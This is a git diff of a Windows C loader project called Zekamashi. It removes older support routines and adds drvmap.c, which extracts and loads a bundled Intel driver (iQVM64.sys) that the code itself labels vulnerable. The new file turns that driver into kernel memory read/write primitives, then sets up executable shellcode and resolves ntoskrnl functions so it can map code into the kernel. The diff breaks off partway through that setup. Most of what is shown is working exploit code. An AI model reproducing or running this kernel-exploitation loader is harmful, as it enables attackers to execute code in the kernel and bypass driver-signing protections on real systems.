-#define RTL_VRF_FLG_RACE_CHECKS 0x00000400
-#define RTL_VRF_FLG_DEADLOCK_CHECKS 0x00000800
-#define RTL_VRF_FLG_FIRST_CHANCE_EXCEPTION_CHECKS 0x00001000
-#define RTL_VRF_FLG_VIRTUAL_MEM_CHECKS 0x00002000
-#define RTL_VRF_FLG_ENABLE_LOGGING 0x00004000
-#define RTL_VRF_FLG_FAST_FILL_HEAP 0x00008000
-#define RTL_VRF_FLG_VIRTUAL_SPACE_TRACKING 0x00010000
-#define RTL_VRF_FLG_ENABLED_SYSTEM_WIDE 0x00020000
-#define RTL_VRF_FLG_MISCELLANEOUS_CHECKS 0x00020000
-#define RTL_VRF_FLG_LOCK_CHECKS 0x00040000
-
-NTSYSAPI
-VOID
-NTAPI
-RtlApplicationVerifierStop(
- _In_ ULONG_PTR Code,
- _In_ PSTR Message,
- _In_ ULONG_PTR Param1,
- _In_ PSTR Description1,
- _In_ ULONG_PTR Param2,
- _In_ PSTR Description2,
- _In_ ULONG_PTR Param3,
- _In_ PSTR Description3,
- _In_ ULONG_PTR Param4,
- _In_ PSTR Description4);
-
-#ifndef VERIFIER_STOP
-#define VERIFIER_STOP(Code, Msg, P1, S1, P2, S2, P3, S3, P4, S4) { \
- RtlApplicationVerifierStop ((Code), \
- (Msg), \
- (ULONG_PTR)(P1),(S1), \
- (ULONG_PTR)(P2),(S2), \
- (ULONG_PTR)(P3),(S3), \
- (ULONG_PTR)(P4),(S4)); \
- }
-#endif
-
-
-//
-// NTOS_RTL HEADER END
-//
-
-#pragma warning(pop)
-
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif NTOS_RTL
diff --git a/Source/Zekamashi/loader/resource.h b/Source/Zekamashi/loader/resource.h
deleted file mode 100644
index 7ca31da..0000000
--- a/Source/Zekamashi/loader/resource.h
+++ /dev/null
@@ -1,14 +0,0 @@
-//{{NO_DEPENDENCIES}}
-// Microsoft Visual C++ generated include file.
-// Used by Resource.rc
-
-// Next default values for new objects
-//
-#ifdef APSTUDIO_INVOKED
-#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 101
-#define _APS_NEXT_COMMAND_VALUE 40001
-#define _APS_NEXT_CONTROL_VALUE 1001
-#define _APS_NEXT_SYMED_VALUE 101
-#endif
-#endif
diff --git a/Source/Zekamashi/loader/sup.c b/Source/Zekamashi/loader/sup.c
deleted file mode 100644
index 39b78fc..0000000
--- a/Source/Zekamashi/loader/sup.c
+++ /dev/null
@@ -1,349 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2014 - 2019
-*
-* TITLE: SUP.C
-*
-* VERSION: 1.100
-*
-* DATE: 04 Jan 2019
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#include "global.h"
-
-/*
-* supPurgeSystemCache
-*
-* Purpose:
-*
-* Flush file cache and memory standby list.
-*
-*/
-VOID supPurgeSystemCache(
- VOID
-)
-{
- SYSTEM_FILECACHE_INFORMATION sfc;
- SYSTEM_MEMORY_LIST_COMMAND smlc;
-
- //flush file system cache
- if (supEnablePrivilege(SE_INCREASE_QUOTA_PRIVILEGE, TRUE)) {
- RtlSecureZeroMemory(&sfc, sizeof(SYSTEM_FILECACHE_INFORMATION));
- sfc.MaximumWorkingSet = (SIZE_T)-1;
- sfc.MinimumWorkingSet = (SIZE_T)-1;
- NtSetSystemInformation(SystemFileCacheInformation, &sfc, sizeof(sfc));
- }
-
- //flush standby list
- if (supEnablePrivilege(SE_PROF_SINGLE_PROCESS_PRIVILEGE, TRUE)) {
- smlc = MemoryPurgeStandbyList;
- NtSetSystemInformation(SystemMemoryListInformation, &smlc, sizeof(smlc));
- }
-}
-
-/*
-* supEnablePrivilege
-*
-* Purpose:
-*
-* Enable/Disable given privilege.
-*
-* Return FALSE on any error.
-*
-*/
-BOOL supEnablePrivilege(
- _In_ DWORD PrivilegeName,
- _In_ BOOL fEnable
-)
-{
- BOOL bResult = FALSE;
- ULONG dummy;
- NTSTATUS status;
- HANDLE hToken;
- TOKEN_PRIVILEGES TokenPrivileges;
-
- status = NtOpenProcessToken(
- GetCurrentProcess(),
- TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
- &hToken);
-
- if (!NT_SUCCESS(status)) {
- return bResult;
- }
-
- TokenPrivileges.PrivilegeCount = 1;
- TokenPrivileges.Privileges[0].Luid.LowPart = PrivilegeName;
- TokenPrivileges.Privileges[0].Luid.HighPart = 0;
- TokenPrivileges.Privileges[0].Attributes = (fEnable) ? SE_PRIVILEGE_ENABLED : 0;
- status = NtAdjustPrivilegesToken(hToken, FALSE, &TokenPrivileges,
- sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, &dummy);
- if (status == STATUS_NOT_ALL_ASSIGNED) {
- status = STATUS_PRIVILEGE_NOT_HELD;
- }
- bResult = NT_SUCCESS(status);
- NtClose(hToken);
- return bResult;
-}
-
-
-/*
-* supCopyMemory
-*
-* Purpose:
-*
-* Copies bytes between buffers.
-*
-* dest - Destination buffer
-* cbdest - Destination buffer size in bytes
-* src - Source buffer
-* cbsrc - Source buffer size in bytes
-*
-*/
-void supCopyMemory(
- _Inout_ void *dest,
- _In_ size_t cbdest,
- _In_ const void *src,
- _In_ size_t cbsrc
-)
-{
- char *d = (char*)dest;
- char *s = (char*)src;
-
- if ((dest == 0) || (src == 0) || (cbdest == 0))
- return;
- if (cbdest < cbsrc)
- cbsrc = cbdest;
-
- while (cbsrc > 0) {
- *d++ = *s++;
- cbsrc--;
- }
-}
-
-/*
-* supGetSystemInfo
-*
-* Purpose:
-*
-* Returns buffer with system information by given InfoClass.
-*
-* Returned buffer must be freed with HeapFree after usage.
-* Function will return error after 100 attempts.
-*
-*/
-PVOID supGetSystemInfo(
- _In_ SYSTEM_INFORMATION_CLASS InfoClass
-)
-{
- INT c = 0;
- PVOID Buffer = NULL;
- HANDLE ProcessHeap = GetProcessHeap();
- ULONG Size = 0x1000;
- NTSTATUS status;
- ULONG memIO;
-
- do {
- Buffer = HeapAlloc(ProcessHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
- if (Buffer != NULL) {
- status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
- }
- else {
- return NULL;
- }
- if (status == STATUS_INFO_LENGTH_MISMATCH) {
- HeapFree(ProcessHeap, 0, Buffer);
- Buffer = NULL;
- Size *= 2;
- c++;
- if (c > 100) {
- status = STATUS_SECRET_TOO_LONG;
- break;
- }
- }
- } while (status == STATUS_INFO_LENGTH_MISMATCH);
-
- if (NT_SUCCESS(status)) {
- return Buffer;
- }
-
- if (Buffer) {
- HeapFree(ProcessHeap, 0, Buffer);
- }
- return NULL;
-}
-
-/*
-* supProcessExist
-*
-* Purpose:
-*
-* Return TRUE if specified process launched, FALSE otherwise or on error.
-*
-*/
-BOOL supProcessExist(
- _In_ LPWSTR lpProcessName
-)
-{
- BOOL cond = FALSE;
- PSYSTEM_PROCESSES_INFORMATION ProcessList, pList;
- UNICODE_STRING procName;
- BOOL bResult = FALSE;
-
- ProcessList = (PSYSTEM_PROCESSES_INFORMATION)supGetSystemInfo(SystemProcessInformation);
- if (ProcessList == NULL) {
- return bResult;
- }
-
- do {
- RtlSecureZeroMemory(&procName, sizeof(procName));
- RtlInitUnicodeString(&procName, lpProcessName);
- pList = ProcessList;
-
- for (;;) {
- if (RtlEqualUnicodeString(&procName, &pList->ImageName, TRUE)) {
- bResult = TRUE;
- break;
- }
- if (pList->NextEntryDelta == 0) {
- break;
- }
- pList = (PSYSTEM_PROCESSES_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta);
- }
-
- } while (cond);
-
- HeapFree(GetProcessHeap(), 0, ProcessList);
- return bResult;
-}
-
-/*
-* supLoadDeviceDriver
-*
-* Purpose:
-*
-* Load tsugumi.sys from current directory.
-*
-*/
-BOOL supLoadDeviceDriver(
- VOID
-)
-{
- BOOL bResult = FALSE, bCond = FALSE;
- SC_HANDLE schSCManager = NULL;
- DWORD cch;
- TCHAR szFile[MAX_PATH * 2], szLog[MAX_PATH * 3];
-
- do {
-
- schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
- if (schSCManager == NULL)
- break;
-
- RtlSecureZeroMemory(szFile, sizeof(szFile));
- cch = GetCurrentDirectory(MAX_PATH, szFile);
- if ((cch != 0) && (cch < MAX_PATH)) {
- _strcat(szFile, TEXT("\\"));
- _strcat(szFile, TSUGUMI_DRV_NAME);
-
- _strcpy(szLog, TEXT("Ldr: Loading Tsugumi Monitor -> "));
- _strcat(szLog, szFile);
- cuiPrintText(szLog, TRUE);
-
- scmInstallDriver(schSCManager, TSUGUMI_DISP_NAME, szFile);
- bResult = scmStartDriver(schSCManager, TSUGUMI_DISP_NAME);
- }
-
- } while (bCond);
-
- if (schSCManager != NULL)
- CloseServiceHandle(schSCManager);
-
- return bResult;
-}
-
-/*
-* supRestartVBoxDrv
-*
-* Purpose:
-*
-* Start VBoxDrv if stopped.
-*
-*/
-BOOL supRestartVBoxDrv(
- _Out_ PULONG lastErrorValue
-)
-{
- BOOL bResult = FALSE;
- SC_HANDLE Manager;
- SC_HANDLE Service;
-
- SERVICE_STATUS_PROCESS Status;
- ULONG dummy, lasterror;
-
- //
- // Assume failure.
- //
- if (lastErrorValue)
- *lastErrorValue = ERROR_UNHANDLED_ERROR;
-
- Manager = OpenSCManager(
- NULL,
- NULL,
- SC_MANAGER_ALL_ACCESS);
-
- if (Manager) {
-
- Service = OpenService(
- Manager,
- TEXT("VBoxDrv"),
- SERVICE_ALL_ACCESS);
-
- if (Service) {
-
- if (QueryServiceStatusEx(
- Service,
- SC_STATUS_PROCESS_INFO,
- (LPBYTE)&Status,
- sizeof(Status),
- &dummy))
- {
- if (Status.dwCurrentState == SERVICE_STOPPED) {
-
- bResult = StartService(Service, 0, NULL);
- lasterror = GetLastError();
-
- }
- else {
- //
- // Driver already running or in pending state, nothing to do.
- //
- bResult = TRUE;
- lasterror = ERROR_SUCCESS;
- }
- }
- else {
- if (lastErrorValue)
- *lastErrorValue = GetLastError();
- }
-
- CloseServiceHandle(Service);
- }
- else {
- if (lastErrorValue)
- *lastErrorValue = GetLastError();
- }
- CloseServiceHandle(Manager);
- }
- else {
- if (lastErrorValue)
- *lastErrorValue = GetLastError();
- }
-
- return bResult;
-}
-
diff --git a/Source/Zekamashi/loader/sup.h b/Source/Zekamashi/loader/sup.h
deleted file mode 100644
index 731fcd3..0000000
--- a/Source/Zekamashi/loader/sup.h
+++ /dev/null
@@ -1,37 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2014 - 2019
-*
-* TITLE: SUP.H
-*
-* VERSION: 1.100
-*
-* DATE: 04 Jan 2019
-*
-* Common header file for the program support routines.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-
-BOOL supEnablePrivilege(
- _In_ DWORD PrivilegeName,
- _In_ BOOL fEnable);
-
-VOID supPurgeSystemCache(
- VOID);
-
-PVOID supGetSystemInfo(
- _In_ SYSTEM_INFORMATION_CLASS InfoClass);
-
-BOOL supProcessExist(
- _In_ LPWSTR lpProcessName);
-
-BOOL supLoadDeviceDriver(
- VOID);
-
-BOOL supRestartVBoxDrv(
- _Out_ PULONG lastErrorValue);
diff --git a/Source/Zekamashi/Zekamashi.sln b/Source/Zekamashi_v2/Zekamashi.sln
similarity index 66%
rename from Source/Zekamashi/Zekamashi.sln
rename to Source/Zekamashi_v2/Zekamashi.sln
index 906734f..e7a9e3a 100644
--- a/Source/Zekamashi/Zekamashi.sln
+++ b/Source/Zekamashi_v2/Zekamashi.sln
@@ -1,7 +1,7 @@

Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 15
-VisualStudioVersion = 15.0.28307.168
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29709.97
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "loader\loader.vcxproj", "{2AFB187B-63FB-40C6-B54C-38D559E5124C}"
EndProject
@@ -9,18 +9,12 @@ Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Release|x64 = Release|x64
- ReleaseForSigned|x64 = ReleaseForSigned|x64
- ReleaseSigned|x64 = ReleaseSigned|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2AFB187B-63FB-40C6-B54C-38D559E5124C}.Debug|x64.ActiveCfg = Debug|x64
{2AFB187B-63FB-40C6-B54C-38D559E5124C}.Debug|x64.Build.0 = Debug|x64
{2AFB187B-63FB-40C6-B54C-38D559E5124C}.Release|x64.ActiveCfg = Release|x64
{2AFB187B-63FB-40C6-B54C-38D559E5124C}.Release|x64.Build.0 = Release|x64
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}.ReleaseForSigned|x64.ActiveCfg = ReleaseForSigned|x64
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}.ReleaseForSigned|x64.Build.0 = ReleaseForSigned|x64
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}.ReleaseSigned|x64.ActiveCfg = ReleaseSigned|x64
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}.ReleaseSigned|x64.Build.0 = ReleaseSigned|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
diff --git a/Source/Tsugumi/Resource.rc b/Source/Zekamashi_v2/loader/Resource.rc
similarity index 82%
rename from Source/Tsugumi/Resource.rc
rename to Source/Zekamashi_v2/loader/Resource.rc
index 0357ebd..58845fc 100644
Binary files a/Source/Tsugumi/Resource.rc and b/Source/Zekamashi_v2/loader/Resource.rc differ
diff --git a/Source/Zekamashi_v2/loader/consts.h b/Source/Zekamashi_v2/loader/consts.h
new file mode 100644
index 0000000..0550e12
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/consts.h
@@ -0,0 +1,25 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2020
+*
+* TITLE: CONSTS.H
+*
+* VERSION: 1.00
+*
+* DATE: 07 Jan 2020
+*
+* Global consts.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+#define NT_REG_PREP L"\\Registry\\Machine"
+#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
+
+#define PROCEXP152 L"PROCEXP152"
\ No newline at end of file
diff --git a/Source/Zekamashi_v2/loader/drv/iQVM64.sys b/Source/Zekamashi_v2/loader/drv/iQVM64.sys
new file mode 100644
index 0000000..2038071
Binary files /dev/null and b/Source/Zekamashi_v2/loader/drv/iQVM64.sys differ
diff --git a/Source/Zekamashi_v2/loader/drv/procexp.sys b/Source/Zekamashi_v2/loader/drv/procexp.sys
new file mode 100644
index 0000000..19b9a82
Binary files /dev/null and b/Source/Zekamashi_v2/loader/drv/procexp.sys differ
diff --git a/Source/Zekamashi_v2/loader/drvmap.c b/Source/Zekamashi_v2/loader/drvmap.c
new file mode 100644
index 0000000..afdbfb5
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/drvmap.c
@@ -0,0 +1,832 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2020
+*
+* TITLE: DRVMAP.C
+*
+* VERSION: 1.00
+*
+* DATE: 24 Jan 2020
+*
+* Driver mapping routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+#include "tsmisc.h"
+
+#define PROVIDER_NAME L"IntelNal"
+#define PROVIDER_DEVICE L"Nal"
+
+
+PMAPPED_CODE_DATA g_MappedData;
+
+/*
+* QueryDriverUnloadOffset
+*
+* Purpose:
+*
+* Return offset to the DriverUnload procedure in TSMI shellcode.
+*
+*/
+ULONG QueryDriverUnloadOffset(
+ _In_ PBYTE ShellcodePtr,
+ _In_ ULONG ShellCodeSize
+)
+{
+ ULONG length = 0, offset = 0;
+ PUCHAR pOpcode;
+ hde64s hs;
+
+ __try {
+
+ //
+ // Calculate next procedure offset.
+ //
+ do {
+ pOpcode = (UCHAR*)RtlOffsetToPointer(ShellcodePtr, offset);
+ hde64_disasm(pOpcode, &hs);
+ if (hs.flags & F_ERROR) {
+ offset = 0;
+ break;
+ }
+
+ length = hs.len;
+ offset += length;
+
+ //
+ // End of function found.
+ //
+ if ((length == 1) && (*pOpcode == 0xC3)) {
+
+ //
+ // Skip padding bytes if present.
+ //
+ do {
+ pOpcode = (UCHAR*)RtlOffsetToPointer(ShellcodePtr, offset);
+ hde64_disasm(pOpcode, &hs);
+ if (hs.flags & F_ERROR) {
+ offset = 0;
+ break;
+ }
+
+ if ((hs.len == 1) && (*pOpcode == 0xCC))
+ offset += hs.len;
+
+ } while (*pOpcode == 0xCC);
+
+ break;
+ }
+
+ } while (offset < ShellCodeSize);
+
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ return 0;
+ }
+ return offset;
+}
+
+/*
+* VirtualToPhysical
+*
+* Purpose:
+*
+* Provider wrapper for VirtualToPhysical routine.
+*
+*/
+BOOL WINAPI VirtualToPhysical(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_ ULONG_PTR* PhysicalAddress)
+{
+ return NalVirtualToPhysical(DeviceHandle,
+ VirtualAddress,
+ PhysicalAddress);
+}
+
+/*
+* ReadKernelVM
+*
+* Purpose:
+*
+* Provider wrapper for ReadKernelVM routine.
+*
+*/
+BOOL WINAPI ReadKernelVM(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ if (Address < g_MaximumUserModeAddress) {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ return FALSE;
+ }
+
+ return NalReadVirtualMemoryEx(DeviceHandle,
+ Address,
+ Buffer,
+ NumberOfBytes);
+}
+
+/*
+* WriteKernelVM
+*
+* Purpose:
+*
+* Provider wrapper for WriteKernelVM routine.
+*
+*/
+BOOL WINAPI WriteKernelVM(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ if (Address < g_MaximumUserModeAddress) {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ return FALSE;
+ }
+
+ return NalWriteVirtualMemoryEx(DeviceHandle,
+ Address,
+ Buffer,
+ NumberOfBytes);
+}
+
+/*
+* CheckMemoryLayout
+*
+* Purpose:
+*
+* Check if shellcode can be placed within the same/next physical page(s).
+*
+*/
+BOOL CheckMemoryLayout(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR TargetAddress,
+ _In_ ULONG SizeOfShell
+)
+{
+ ULONG_PTR memPage, physAddrStart, physAddrEnd;
+
+ memPage = (TargetAddress & 0xfffffffffffff000ull);
+
+ if (VirtualToPhysical(DeviceHandle,
+ memPage,
+ &physAddrStart))
+ {
+ memPage = (TargetAddress + SizeOfShell) & 0xfffffffffffff000ull;
+
+ if (VirtualToPhysical(DeviceHandle,
+ memPage,
+ &physAddrEnd))
+ {
+ ULONG_PTR diffAddr = physAddrEnd - physAddrStart;
+
+ if (diffAddr > PAGE_SIZE)
+ return FALSE;
+ else
+ return TRUE;
+ }
+
+ }
+ return FALSE;
+}
+
+
+/*
+* StartVulnerableDriver
+*
+* Purpose:
+*
+* Load vulnerable driver and return handle for it device or NULL in case of error.
+*
+*/
+HANDLE StartVulnerableDriver(
+ _In_ ULONG uResourceId,
+ _In_ HINSTANCE hInstance,
+ _In_ LPWSTR lpDriverName,
+ _In_ LPWSTR lpDeviceName,
+ _In_ LPWSTR lpFullFileName
+)
+{
+ BOOL bLoaded = FALSE;
+ PBYTE drvBuffer;
+ NTSTATUS ntStatus;
+ ULONG resourceSize = 0;
+ HANDLE deviceHandle = NULL;
+
+ printf_s("[>] Entering %s\r\n", __FUNCTION__);
+
+ //
+ // Check if driver already loaded.
+ //
+ if (supIsObjectExists((LPWSTR)L"\\Device", lpDeviceName)) {
+ printf_s("[!] Vulnerable driver already loaded\r\n");
+ bLoaded = TRUE;
+ }
+ else {
+
+ //
+ // Driver is not loaded, load it.
+ //
+
+ drvBuffer = supQueryResourceData(uResourceId, hInstance, &resourceSize);
+ if (drvBuffer == NULL) {
+ printf_s("[!] Driver resource id not found %lu\r\n", uResourceId);
+ return NULL;
+ }
+
+ if (resourceSize != (ULONG)supWriteBufferToFile(lpFullFileName,
+ drvBuffer,
+ resourceSize,
+ TRUE,
+ FALSE,
+ &ntStatus))
+ {
+ printf_s("[!] Unable to extract vulnerable driver, NTSTATUS (0x%lX)\r\n", ntStatus);
+ return NULL;
+ }
+
+ ntStatus = supLoadDriver(lpDriverName, lpFullFileName, FALSE);
+ if (NT_SUCCESS(ntStatus)) {
+ printf_s("LDR: Vulnerable driver \"%ws\" loaded\r\n", lpDriverName);
+ bLoaded = TRUE;
+ }
+ else {
+ printf_s("[!] Unable to load vulnerable driver, NTSTATUS (0x%lX)\r\n", ntStatus);
+ DeleteFile(lpFullFileName);
+ }
+ }
+
+ if (bLoaded) {
+ ntStatus = supOpenDriver(lpDeviceName, &deviceHandle);
+ if (!NT_SUCCESS(ntStatus))
+ printf_s("[!] Unable to open vulnerable driver, NTSTATUS (0x%lX)\r\n", ntStatus);
+ else
+ printf_s("LDR: Vulnerable driver opened\r\n");
+ }
+
+ printf_s("[<] Leaving %s\r\n", __FUNCTION__);
+
+ return deviceHandle;
+}
+
+/*
+* StopVulnerableDriver
+*
+* Purpose:
+*
+* Unload previously loaded vulnerable driver.
+*
+*/
+void StopVulnerableDriver(
+ _In_ LPWSTR lpDriverName,
+ _In_opt_ LPWSTR lpFullFileName
+)
+{
+ NTSTATUS ntStatus;
+
+ printf_s("[>] Entering %s\r\n", __FUNCTION__);
+
+ ntStatus = supUnloadDriver(lpDriverName, TRUE);
+ if (!NT_SUCCESS(ntStatus)) {
+ printf_s("[!] Unable to unload vulnerable driver, NTSTATUS (0x%lX)\r\n", ntStatus);
+ }
+ else {
+
+ printf_s("LDR: Vulnerable driver unloaded\r\n");
+ ULONG retryCount = 3;
+
+ if (lpFullFileName) {
+ do {
+ Sleep(1000);
+ if (DeleteFile(lpFullFileName)) {
+ printf_s("LDR: Vulnerable driver file removed\r\n");
+ break;
+ }
+
+ retryCount--;
+
+ } while (retryCount);
+ }
+ }
+
+ printf_s("[<] Leaving %s\r\n", __FUNCTION__);
+}
+
+/*
+* ProviderCreate
+*
+* Purpose:
+*
+* Load vulnerable driver and return it device handle and filename.
+*
+*/
+BOOL ProviderCreate(
+ _Out_ HANDLE* DeviceHandle,
+ _Out_ LPWSTR* DriverFileName)
+{
+ BOOL bResult = FALSE;
+ HANDLE deviceHandle = NULL;
+ HINSTANCE hInstance = GetModuleHandle(NULL);
+ LPWSTR driverFileName;
+
+ *DeviceHandle = NULL;
+ *DriverFileName = NULL;
+
+ printf_s("[>] Entering %s\r\n", __FUNCTION__);
+
+ do {
+
+ PUNICODE_STRING CurrentDirectory = &NtCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath;
+ SIZE_T length = 64 +
+ (_strlen(PROVIDER_NAME) * sizeof(WCHAR)) +
+ CurrentDirectory->Length;
+
+ //
+ // Build filename for vulnerable driver.
+ //
+ driverFileName = (LPWSTR)supHeapAlloc(length);
+ if (driverFileName == NULL) {
+ printf_s("[!] Could not allocate memory for driver name, error %lu\r\n", GetLastError());
+ break;
+ }
+
+ length = CurrentDirectory->Length / sizeof(WCHAR);
+
+ _strncpy(driverFileName,
+ length,
+ CurrentDirectory->Buffer,
+ length);
+
+ _strcat(driverFileName, TEXT("\\"));
+ _strcat(driverFileName, PROVIDER_NAME);
+ _strcat(driverFileName, TEXT(".sys"));
+
+ //
+ // Install and run vulnerable driver.
+ //
+ deviceHandle = StartVulnerableDriver(IDR_iQVM64,
+ hInstance,
+ PROVIDER_NAME,
+ PROVIDER_DEVICE,
+ driverFileName);
+
+ *DeviceHandle = deviceHandle;
+ *DriverFileName = driverFileName;
+
+ bResult = TRUE;
+
+ } while (FALSE);
+
+ printf_s("[<] Leaving %s\r\n", __FUNCTION__);
+
+ return bResult;
+}
+
+/*
+* ProviderRelease
+*
+* Purpose:
+*
+* Unload vulnerable driver and free resources.
+*
+*/
+VOID ProviderRelease(
+ _In_ HANDLE DeviceHandle,
+ _In_ LPWSTR DriverFileName)
+{
+ printf_s("[>] Entering %s\r\n", __FUNCTION__);
+
+ if (DeviceHandle) {
+ CloseHandle(DeviceHandle);
+ StopVulnerableDriver(PROVIDER_NAME, DriverFileName);
+
+ if (DriverFileName)
+ supHeapFree(DriverFileName);
+ }
+
+ printf_s("[<] Leaving %s\r\n", __FUNCTION__);
+}
+
+PVOID ResolveFunction(
+ _In_ ULONG_PTR KernelBase,
+ _In_ ULONG_PTR KernelImage,
+ _In_ LPCSTR Function)
+{
+ ULONG_PTR Address = supGetProcAddress(KernelBase, KernelImage, Function);
+ if (Address == 0) {
+ printf_s("[!] Error, %s address not found\r\n", Function);
+ return 0;
+ }
+
+ printf_s("LDR: %s 0x%llX\r\n", Function, Address);
+ return (PVOID)Address;
+}
+
+#define ASSERT_RESOLVED_FUNC(FunctionPtr) { if (FunctionPtr == 0) break; }
+
+/*
+* SetupShellCode
+*
+* Purpose:
+*
+* Create and fill shellcode with data.
+*
+*/
+BOOL SetupShellCode(
+ _In_ PTABLE_DESC ConfigurationData)
+{
+ BOOL bResult = FALSE;
+ NTSTATUS ntStatus;
+ UNICODE_STRING ustr;
+
+ ULONG_PTR KernelBase, KernelImage = 0;
+
+ WCHAR szNtOs[MAX_PATH * 2];
+
+ printf_s("[>] Entering %s\r\n", __FUNCTION__);
+
+ do {
+
+ KernelBase = supGetNtOsBase();
+ if (KernelBase == 0) {
+ printf_s("[!] Cannot query ntoskrnl loaded base, abort\r\n");
+ break;
+ }
+
+ printf_s("LDR: Loaded ntoskrnl base 0x%llX\r\n", KernelBase);
+
+ //
+ // Preload ntoskrnl.exe
+ //
+ _strcpy(szNtOs, USER_SHARED_DATA->NtSystemRoot);
+ _strcat(szNtOs, L"\\system32\\ntoskrnl.exe");
+
+ RtlInitUnicodeString(&ustr, szNtOs);
+ ntStatus = LdrLoadDll(NULL, NULL, &ustr, (PVOID*)&KernelImage);
+
+ if ((!NT_SUCCESS(ntStatus)) || (KernelImage == 0)) {
+ printf_s("[!] Error while loading ntoskrnl.exe, NTSTATUS (0x%lX)\r\n", ntStatus);
+ break;
+ }
+
+ printf_s("LDR: Ntoskrnl.exe mapped at 0x%llX\r\n", KernelImage);
+
+ //
+ // Allocate shellcode.
+ //
+ g_MappedData = (PMAPPED_CODE_DATA)VirtualAlloc(NULL, sizeof(MAPPED_CODE_DATA),
+ MEM_RESERVE | MEM_COMMIT,
+ PAGE_EXECUTE_READWRITE);
+
+ if (g_MappedData == NULL)
+ break;
+
+ //
+ // Remember function pointers.
+ //
+
+ g_MappedData->_wcsnicmp =
+ ResolveFunction(KernelBase, KernelImage, "_wcsnicmp");
+ ASSERT_RESOLVED_FUNC(g_MappedData->_wcsnicmp);
+
+ g_MappedData->IoAllocateMdl =
+ ResolveFunction(KernelBase, KernelImage, "IoAllocateMdl");
+ ASSERT_RESOLVED_FUNC(g_MappedData->IoAllocateMdl);
+
+ g_MappedData->IofCompleteRequest =
+ ResolveFunction(KernelBase, KernelImage, "IofCompleteRequest");
+ ASSERT_RESOLVED_FUNC(g_MappedData->IofCompleteRequest);
+
+ g_MappedData->IoFreeMdl =
+ ResolveFunction(KernelBase, KernelImage, "IoFreeMdl");
+ ASSERT_RESOLVED_FUNC(g_MappedData->IoFreeMdl);
+
+ g_MappedData->PsGetCurrentProcessId =
+ ResolveFunction(KernelBase, KernelImage, "PsGetCurrentProcessId");
+ ASSERT_RESOLVED_FUNC(g_MappedData->PsGetCurrentProcessId);
+
+ g_MappedData->PsSetLoadImageNotifyRoutine =
+ ResolveFunction(KernelBase, KernelImage, "PsSetLoadImageNotifyRoutine");
+ ASSERT_RESOLVED_FUNC(g_MappedData->PsSetLoadImageNotifyRoutine);
+
+ g_MappedData->MmProtectMdlSystemAddress =
+ ResolveFunction(KernelBase, KernelImage, "MmProtectMdlSystemAddress");
+ ASSERT_RESOLVED_FUNC(g_MappedData->MmProtectMdlSystemAddress);
+
+ g_MappedData->MmUnmapLockedPages =
+ ResolveFunction(KernelBase, KernelImage, "MmUnmapLockedPages");
